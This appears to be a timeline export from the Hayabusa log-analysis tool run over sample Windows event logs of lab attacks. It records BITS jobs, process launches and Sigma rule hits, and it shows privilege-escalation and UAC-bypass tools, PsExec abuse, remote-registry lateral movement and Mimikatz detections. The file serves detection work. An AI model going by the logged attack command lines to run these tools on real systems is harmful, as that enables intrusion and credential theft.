Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:46:04.676 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:52:42.355 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:52:43.097 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 11:05:14.300 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:44:11.565 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: 
https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:46:56.224 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:46:56.973 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 14:09:10.403 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 15:34:38.147 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 15:41:52.668 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 12:47:56.181 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 12:47:57.912 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:06:52.429 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 23:55:56.229 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:56:29.274 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: 
http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:57:51.221 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:57:59.420 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 14:04:33.703 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 14:04:36.013 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 10:44:49.642 +00:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: 
""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:44:49.642 +00:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:45:14.007 +00:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:45:24.216 +00:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/image_load_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 13:23:30.614 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 13:23:32.141 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-26 17:38:11.138 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.138 +00:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.147 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.154 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-26 17:38:11.175 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 
00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 20:15:22.956 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 20:15:23.662 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 16:17:33.019 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 16:17:34.712 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 12:31:21.179 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 12:31:22.012 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 16:29:22.597 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 13:15:33.442 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.470 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:04.545 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-04 22:41:05.471 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-09 16:52:34.562 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.562 
+00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.622 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:34.622 +00:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:41.861 +00:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.478 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 
16:52:42.478 +00:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.933 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:42.934 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:44.864 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:44.864 +00:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 16:52:45.141 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-09 22:45:33.090 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-09 22:45:34.204 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 11:18:52.190 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:52.191 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:52.447 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 
(MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:54.600 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 11:18:54.856 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 12:28:01.299 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.299 +00:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.566 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | 
